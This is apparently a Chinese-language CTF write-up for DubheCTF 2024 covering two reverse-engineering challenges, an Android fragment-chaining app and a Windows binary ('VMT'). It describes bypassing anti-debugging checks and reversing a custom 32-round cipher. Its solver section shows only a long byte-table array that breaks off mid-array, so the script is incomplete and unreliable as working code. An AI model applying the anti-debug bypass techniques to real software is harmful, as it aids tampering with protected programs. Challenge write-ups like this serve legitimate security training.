Featured image of post DubheCTF 2024
Writeup

DubheCTF 2024

UKFC 2024 DubheCTF Writeup

Re

fffffragment

主页面是两个按钮,通过一系列的链式调用方法启动另一个 activity,bundle2 传输了当前的数据,进入 fragmentchang1 查看

当按下第一个/第二个按钮时将触发 m1/m2 加密,并将上一步得到的字符串进行累加,并再次通过链式调用进入下一个 fragment,循环 256 次到达最后的 flag 输出界面

接下来就是手搓的时间了(我觉得应该用污点引擎进行寻路的 然而环境没配好),最后得到 flag

VMT

输入前有四个反调试,两个 patch 掉 abort()函数,两个通过挂起进程方式绕过

输入长度为 36 时触发异常,将原先密钥 N0ThisiS4F4k3K3Y 更改为 Pyu0Z8#bC5vqUFgt

加密函数在 sub_14D5A0,具体是将输入的字符串转成十六进制字符串,在 sub_14CFD0 处进行加密,每十六位为一组循环,不够则补 0xa

加密函数的逻辑是,首先将十六进制字符串分为四组,然后对上面的密钥进行扩展生成一个 256 位数组,对四组输入字符串进行 32 轮加密。首先对后三个字符串进行异或,然后将异或结果放入 sub_14B070 进行查表加密和进一步的位移加密,最后将结果异或第一个字符串后,重新生成四位字符串进行下一轮加密。

exp:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288

map = [0x44,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x30,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x39,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x45,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x43,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x43,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x32,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x46,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x43,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x35,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x37,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x41,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x34,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x31,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x36,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x39,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x36,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x36,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x39,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x37,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x33,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x34,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x33,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x31,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x41,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x43,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x38,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x38,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x35,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x30,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x41,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x34,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x30,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x37,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x43,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x33,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x33,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x38,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x34,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x38,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x38,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x31,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x30,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x34,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x30,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x36,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x44,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x35,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x44,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x41,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x32,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x32,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x43,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x42,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x31,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x35,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x39,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x44,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x37,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x32,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x43,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x36,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x45,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x42,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x38,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x32,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x30,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x37,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x38,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
